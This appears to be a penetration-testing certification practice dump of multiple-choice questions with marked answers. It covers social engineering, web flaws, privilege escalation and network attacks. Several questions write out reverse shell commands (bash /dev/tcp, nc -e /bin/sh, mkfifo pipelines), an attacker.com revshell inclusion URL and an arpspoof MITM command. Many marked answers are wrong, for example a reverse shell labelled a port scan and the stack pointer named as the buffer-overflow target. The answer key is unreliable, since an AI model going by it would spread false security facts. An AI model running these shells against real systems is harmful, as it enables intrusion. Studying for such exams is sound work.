During a full-scope security assessment, which of the following is a prerequisite to social engineer a target by physically engaging them?
A. Locating emergency exits
B. Preparing a pretext
C. Shoulder surfing the victim
D. Tailgating the victim
B. Preparing a pretext
100%
A penetration tester is performing a code review. Which of the following testing techniques is being performed?
A. Dynamic analysis
B. Fuzzing analysis
C. Static analysis
D. Run-time analysis
C. Static analysis
100%
A penetration tester reports an application is only utilizing basic authentication on an Internet-facing application. Which of the following would be the BEST remediation strategy?
A. Enable HTTP Strict Transport Security.
B. Enable a secure cookie flag.
C. Encrypt the communication channel.
D. Sanitize invalid user input.
A. Enable HTTP Strict Transport Security.
A security assessor completed a comprehensive penetration test of a company and its networks and systems. During the assessment, the tester identified a vulnerability in the crypto library used for TLS on the company’s intranet-wide payroll web application. However, the vulnerability has not yet been patched by the vendor, although a patch is expected within days. Which of the following strategies would BEST mitigate the risk of impact?
A. Modify the web server crypto configuration to use a stronger cipher-suite for encryption, hashing, and digital signing.
B. Implement new training to be aware of the risks in accessing the application. This training can be decommissioned after the vulnerability is patched.
C. Implement an ACL to restrict access to the application exclusively to the finance department. Reopen the application to company staff after the vulnerability is patched.
D. Require payroll users to change the passwords used to authenticate to the application. Following the patching of the vulnerability, implement another required password change.
C. Implement an ACL to restrict access to the application exclusively to the finance department. Reopen the application to company staff after the vulnerability is patched.
100%
An email sent from the Chief Executive Officer (CEO) to the Chief Financial Officer (CFO) states a wire transfer is needed to pay a new vendor. Neither is aware of the vendor, and the CEO denies ever sending the email. Which of the following types of motivation was used in this attack?
A. Principle of fear
B. Principle of authority
C. Principle of scarcity
D. Principle of likeness
E. Principle of social proof
B. Principle of authority
100%
A penetration tester is performing a remote scan to determine if the server farm is compliant with the company’s software baseline. Which of the following should the penetration tester perform to verify compliance with the baseline?
A. Discovery scan
B. Stealth scan
C. Full scan
D. Credentialed scan
A. Discovery scan
100%
While monitoring WAF logs, a security analyst discovers a successful attack against the following URL:
https://example.com/index.php?Phone=http://attacker.com/badstuffhappens/revshell.php
Which of the following remediation steps should be taken to prevent this type of attack?
A. Implement a blacklist.
B. Block URL redirections.
C. Double URL encode the parameters.
D. Stop external calls from the application.
B. Block URL redirections.
100%
A software developer wants to test the code of an application for vulnerabilities. Which of the following processes should the software developer perform?
A. Vulnerability scan
B. Dynamic scan
C. Static scan
D. Compliance scan
B. Dynamic scan
100%
An engineer, who is conducting a penetration test for a web application, discovers the user login process sends from field data using the HTTP GET method. To mitigate the risk of exposing sensitive information, the form should be sent using an:
A. HTTP POST method.
B. HTTP OPTIONS method.
C. HTTP PUT method.
D. HTTP TRACE method.
A. HTTP POST method.
100%
A penetration tester wants to script out a way to discover all the RPTR records for a range of IP addresses. Which of the following is the MOST efficient to utilize?
A. nmap -p 53 -oG dnslist.txt | cut -d “:” -f 4
B. nslookup -ns 8.8.8.8 << dnslist.txt
C. for x in {1…254}; do dig -x 192.168.$x.$x; done
D. dig -r > echo “8.8.8.8” >> /etc/resolv.conf
C. for x in {1…254}; do dig -x 192.168.$x.$x; done
100%
After gaining initial low-privilege access to a Linux system, a penetration tester identifies an interesting binary in a user’s home folder titled ”changepass.”
-sr-xr-x 1 root root 6443 Oct 18 2017 /home/user/changepass
Using “strings” to print ASCII printable characters from changepass, the tester notes the following:
$ strings changepass
exit
setuid
strcmp
GLIBC_2.0
ENV_PATH
%s/changepw
malloc
strlen
Given this information, which of the following is the MOST likely path of exploitation to achieve root privileges on the machine?
A. Copy changepass to a writable directory and export the ENV_PATH environmental variable to the path of a token-stealing binary titled changepw. Then run changepass.
B. Create a copy of changepass in the same directory, naming it changepw. Export the ENV_PATH environmental variable to the path ‘/home/user/’. Then run changepass.
C. Export the ENV_PATH environmental variable to the path of a writable directory that contains a token- stealing binary titled changepw. Then run changepass.
D. Run changepass within the current directory with sudo after exporting the ENV_PATH environmental variable to the path of ‘/usr/local/bin’.
D. Run changepass within the current directory with sudo after exporting the ENV_PATH environmental variable to the path of ‘/usr/local/bin’.
A penetration tester has successfully deployed an evil twin and is starting to see some victim traffic. The next step the penetration tester wants to take is to capture all the victim web traffic unencrypted. Which of the following would BEST meet this goal?
A. Perform an HTTP downgrade attack.
B. Harvest the user credentials to decrypt traffic.
C. Perform an MITM attack.
D. Implement a CA attack by impersonating trusted CAs.
A. Perform an HTTP downgrade attack.
Which of the following types of intrusion techniques is the use of an “under-the-door tool” during a physical security assessment an example of?
A. Lockpicking
B. Egress sensor triggering
C. Lock bumping
D. Lock bypass
D. Lock bypass
The following line was found in an exploited machine’s history file. An attacker ran the following command:
bash -i >& /dev/tcp/192.168.0.1/80 0> &1
Which of the following describes what the command does?
A. Performs a port scan.
B. Grabs the web server’s banner.
C. Redirects a TTY to a remote system.
D. Removes error logs for the supplied IP.
A. Performs a port scan.
Which of the following are MOST important when planning for an engagement? (Select TWO).
A. Goals/objectives
B. Architectural diagrams
C. Tolerance to impact
D. Storage time for a report
E. Company policies
A. Goals/objectives
C. Tolerance to impact
A penetration tester observes that the content security policy header is missing during a web application penetration test. Which of the following techniques would the penetration tester MOST likely perform?
A. Command injection attack
B. Clickjacking attack
C. Directory traversal attack
D. Remote file inclusion attack
B. Clickjacking attack
A penetration tester compromises a system that has unrestricted network access over port 443 to any host. The penetration tester wants to create a reverse shell from the victim back to the attacker. Which of the following methods would the penetration tester MOST likely use?
A. perl -e ‘use SOCKET’; $i=’; $p=’443;
B. ssh superadmin@ -p 443
C. nc -e /bin/sh 443
D. bash -i >& /dev/tcp//443 0>&1
D. bash -i >& /dev/tcp//443 0>&1
A penetration tester wants to launch a graphic console window from a remotely compromised host with IP 10.0.0.20 and display the terminal on the local computer with IP 192.168.1.10. Which of the following would accomplish this task?
A. From the remote computer, run the following commands:
export XHOST 192.168.1.10:0.0
xhost+
Terminal
B. From the local computer, run the following command:
ssh -L4444:127.0.0.1:6000 -X user@10.0.0.20 xterm
C. From the remote computer, run the following command:
ssh -R6000:127.0.0.1:4444 -p 6000 user@192.168.1.10 “xhost+; xterm”
D. From the local computer, run the following command:
nc -l -p 6000
Then, from the remote computer, run the following command:
xterm | nc 192.168.1.10 6000
A. From the remote computer, run the following commands:
export XHOST 192.168.1.10:0.0
xhost+
Terminal
A penetration tester is in the process of writing a report that outlines the overall level of risk to operations. In which of the following areas of the report should the penetration tester put this?
A. Appendices
B. Executive summary
C. Technical summary
D. Main body
B. Executive summary
A company requested a penetration tester review the security of an in-house developed Android application. The penetration tester received an APK file to support the assessment. The penetration tester wants to run SAST on the APK file. Which of the following preparatory steps must the penetration tester do FIRST? (Select TWO).
A. Convert to JAR.
B. Decompile.
C. Cross-compile the application.
D. Convert JAR files to DEX.
E. Re-sign the APK.
F. Attach to ADB.
A. Convert to JAR.
B. Decompile.
Which of the following commands starts the Metasploit database?
Which of the following commands starts the Metasploit database?
A. msfconsole
B. workspace
C. msfvenom
D. db_init
E. db_connect
A. msfconsole
Consumer-based IoT devices are often less secure than systems built for traditional desktop computers. Which of the following BEST describes the reasoning for this?
A. Manufacturers developing IoT devices are less concerned with security.
B. It is difficult for administrators to implement the same security standards across the board.
C. IoT systems often lack the hardware power required by more secure solutions.
D. Regulatory authorities often have lower security requirements for IoT systems.
A. Manufacturers developing IoT devices are less concerned with security.
During a web application assessment, a penetration tester discovers that arbitrary commands can be executed on the server. Wanting to take this attack one step further, the penetration tester begins to explore ways to gain a reverse shell back to the attacking machine at 192.168.1.5. Which of the following are possible ways to do so? (Select TWO).
A. nc 192.168.1.5 44444
B. nc -nlvp 44444 -e /bin/sh
C. rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.1.5 44444>/ tmp/f
D. nc -e /bin/sh 192.168.1.5 44444
E. rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.1.5 444444>/ tmp/f
F. rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.5.1 44444>/ tmp/f
B. nc -nlvp 44444 -e /bin/sh
C. rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.1.5 44444>/ tmp/f
Which of the following CPU registers does the penetration tester need to overwrite in order to exploit a simple buffer overflow?
A. Stack pointer register
B. Index pointer register
C. Stack base pointer
D. Destination index register
A. Stack pointer register
A security assessor is attempting to craft specialized XML files to test the security of the parsing functions during ingest into a Windows application. Before beginning to test the application, which of the following should the assessor request from the organization?
A. Sample SOAP messages
B. The REST API documentation
C. A protocol fuzzing utility
D. An applicable XSD file
D. An applicable XSD file
Which of the following is an example of a spear phishing attack?
A. Targeting an executive with an SMS attack
B. Targeting a specific team with an email attack
C. Targeting random users with a USB key drop
D. Targeting an organization with a watering hole attack
A. Targeting an executive with an SMS attack
A healthcare organization must abide by local regulations to protect and attest to the protection of personal health information of covered individuals. Which of the following conditions should a penetration tester specifically test for when performing an assessment? (Select TWO).
A. Cleartext exposure of SNMP trap data
B. Software bugs resident in the IT ticketing system
C. S/MIME certificate templates defined by the CA
D. Health information communicated over HTTP
E. DAR encryption on records servers
D. Health information communicated over HTTP
E. DAR encryption on records servers
An energy company contracted a security firm to perform a penetration test of a power plant, which employs ICS to manage power generation and cooling. Which of the following is a consideration unique to such an environment that must be made by the firm when preparing for the assessment?
A. Selection of the appropriate set of security testing tools
B. Current and load ratings of the ICS components
C. Potential operational and safety hazards
D. Electrical certification of hardware used in the test
A. Selection of the appropriate set of security testing tools
A client has requested an external network penetration test for compliance purposes. During discussion between the client and the penetration tester, the client expresses unwillingness to add the penetration tester’s source IP addresses to the client’s IPS whitelist for the duration of the test. Which of the following is the BEST argument as to why the penetration tester’s source IP addresses should be whitelisted?
A. Whitelisting prevents a possible inadvertent DoS attack against the IPS and supporting log-monitoring systems.
B. Penetration testing of third-party IPS systems often requires additional documentation and authorizations; potentially delaying the time-sensitive test.
C. IPS whitelisting rules require frequent updates to stay current, constantly developing vulnerabilities and newly discovered weaknesses.
D. Testing should focus on the discovery of possible security issues across all in-scope systems, not on determining the relative effectiveness of active defenses such as an IPS.
D. Testing should focus on the discovery of possible security issues across all in-scope systems, not on determining the relative effectiveness of active defenses such as an IPS.
A malicious user wants to perform an MITM attack on a computer. The computer network configuration is given below:
IP: 192.168.1.20
NETMASK: 255.255.255.0
DEFAULT GATEWAY: 192.168.1.254
DHCP: 192.168.1.253
DNS: 192.168.10.10, 192.168.20.10
Which of the following commands should the malicious user execute to perform the MITM attack?
A. arpspoof -c both -r -t 192.168.1.1 192.168.1.20
B. arpspoof -t 192.168.1.20 192.168.1.254
C. arpspoof -c both -t 192.168.1.20 192.168.1.253
D. arpspoof -r -t 192.168.1.253 192.168.1.20
B. arpspoof -t 192.168.1.20 192.168.1.254